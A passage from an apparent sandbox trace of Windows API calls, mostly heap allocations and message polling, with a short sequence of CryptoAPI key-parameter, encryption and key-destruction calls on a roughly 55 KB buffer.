(HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd984) returned 0x89d940 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.765] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.766] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.766] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.767] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.767] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.768] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.769] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.769] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.769] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.770] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.770] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.770] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.770] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.770] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.770] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.770] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.770] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.770] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.771] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xd984, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xd990) returned 1 [0031.771] CharLowerBuffW (in: lpsz="byte[55697]", cchLength=0xb | out: lpsz="byte[55697]") returned 0xb [0031.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.772] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8ab2d0*, pdwDataLen=0x6ae220*=0xd984, dwBufLen=0xd990 | out: pbData=0x8ab2d0*, pdwDataLen=0x6ae220*=0xd990) returned 1 [0031.772] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.777] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.778] CryptDestroyKey (hKey=0x7c2280) returned 1 [0031.778] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 